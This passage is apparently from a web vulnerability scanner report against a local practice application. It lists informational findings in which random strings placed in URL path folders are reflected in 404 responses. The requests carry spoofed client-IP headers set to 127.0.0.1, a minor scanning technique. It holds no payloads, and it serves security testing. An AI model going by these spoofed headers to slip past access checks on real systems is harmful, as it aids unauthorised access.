Date: Thu, 18 Oct 2018 21:07:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/instructions21q5rcjig9 was not found on this server.</p>
...[SNIP]...
19.117. http://localhost/examplewebiste/instructions [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/instructions

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistetckuhbnmqr/instructions HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 310
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistetckuhbnmqr/instructions was not found on this server.</p>
...[SNIP]...
19.118. http://localhost/examplewebiste/vulnerabilities/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities2vsk363mx5/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:34 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities2vsk363mx5/ was not found on this server.</p>
...[SNIP]...
19.119. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiestu8kd7n8rz/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiestu8kd7n8rz/brute/ was not found on this server.</p>
...[SNIP]...
19.120. http://localhost/examplewebiste/vulnerabilities/brute/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brutellqgwqed24/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 320
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brutellqgwqed24/ was not found on this server.</p>
...[SNIP]...
19.121. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesz1gg64nos1/brute/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesz1gg64nos1/brute/help/ was not found on this server.</p>
...[SNIP]...
19.122. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/bruteduvdoner0o/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/bruteduvdoner0o/help/ was not found on this server.</p>
...[SNIP]...
19.123. http://localhost/examplewebiste/vulnerabilities/brute/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brute/helpzdl88v16bf/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brute/helpzdl88v16bf/ was not found on this server.</p>
...[SNIP]...
19.124. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities3i3m931b7u/brute/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:07:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities3i3m931b7u/brute/source/ was not found on this server.</p>
...[SNIP]...
19.125. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brute4r75aody5h/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brute4r75aody5h/source/ was not found on this server.</p>
...[SNIP]...
19.126. http://localhost/examplewebiste/vulnerabilities/brute/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/brute/sourceu25p1nv2j1/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:35 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/brute/sourceu25p1nv2j1/ was not found on this server.</p>
...[SNIP]...
19.127. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesn620pgz7w4/captcha/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesn620pgz7w4/captcha/ was not found on this server.</p>
...[SNIP]...
19.128. http://localhost/examplewebiste/vulnerabilities/captcha/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captchaq32hr6z7c1/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:08:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captchaq32hr6z7c1/ was not found on this server.</p>
...[SNIP]...
19.129. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitiesaq2ua23gk9/captcha/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:02 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitiesaq2ua23gk9/captcha/help/ was not found on this server.</p>
...[SNIP]...
19.130. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captchaj4jfpookga/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captchaj4jfpookga/help/ was not found on this server.</p>
...[SNIP]...
19.131. http://localhost/examplewebiste/vulnerabilities/captcha/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captcha/helprmbxsos2w2/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 327
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captcha/helprmbxsos2w2/ was not found on this server.</p>
...[SNIP]...
19.132. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieso6q42tizk6/captcha/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieso6q42tizk6/captcha/source/ was not found on this server.</p>
...[SNIP]...
19.133. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/source/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captchaue6h5mcaf0/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:43 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captchaue6h5mcaf0/source/ was not found on this server.</p>
...[SNIP]...
19.134. http://localhost/examplewebiste/vulnerabilities/captcha/source/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/captcha/source/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/captcha/source7qk4cukpnn/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:54 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 329
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/captcha/source7qk4cukpnn/ was not found on this server.</p>
...[SNIP]...
19.135. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities5nf1phj34n/csp/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities5nf1phj34n/csp/ was not found on this server.</p>
...[SNIP]...
19.136. http://localhost/examplewebiste/vulnerabilities/csp/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp74uat060ck/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 318
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp74uat060ck/ was not found on this server.</p>
...[SNIP]...
19.137. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/help/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilitieslcxdiipeqo/csp/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:09:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilitieslcxdiipeqo/csp/help/ was not found on this server.</p>
...[SNIP]...
19.138. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/help/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp5ux2pan4kk/help/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp5ux2pan4kk/help/ was not found on this server.</p>
...[SNIP]...
19.139. http://localhost/examplewebiste/vulnerabilities/csp/help/ [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/help/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/csp/helpokmdusq9nr/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/csp/helpokmdusq9nr/ was not found on this server.</p>
...[SNIP]...
19.140. http://localhost/examplewebiste/vulnerabilities/csp/source/ [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csp/source/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities5cfowtwx79/csp/source/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:10:03 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 325
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
